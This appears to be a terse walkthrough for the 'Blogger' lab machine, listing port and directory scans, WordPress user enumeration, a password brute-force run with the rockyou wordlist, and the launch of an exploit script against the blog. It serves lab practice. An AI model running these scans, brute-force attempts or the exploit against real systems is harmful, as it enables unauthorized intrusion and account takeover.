๐Ÿ…ฑ๏ธBlogger

nmap 192.168.228.217 -sVC -A -p- --min-rate 10000

rustscan --addresses 192.168.228.217 --ulimit 5000 -- -A -sC -Pn -sV -T 1500

gobuster dir -u http://192.168.228.217/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b "400,403,404" -t 50 -e -x "html,php,txt,jsp"

feroxbuster -u http://192.168.228.217/ --no-recursion -vv

nikto -h http://192.168.228.217/

wpscan --url http://blogger.pg/assets/fonts/blog/ -e u,ap,at

Using Below command to enumerate users and brute forcing password

wpscan --url http://blogger.pg/assets/fonts/blog/ -e u,p,t -P /usr/share/wordlists/rockyou.txt

wpscan --url http://blogger.pg/assets/fonts/blog/ -U j@m3s -P /usr/share/wordlists/rockyou.txt -t 10

python3 49967.py -u http://blogger.pg/assets/fonts/blog/ -p /?p=9

Last updated

Was this helpful?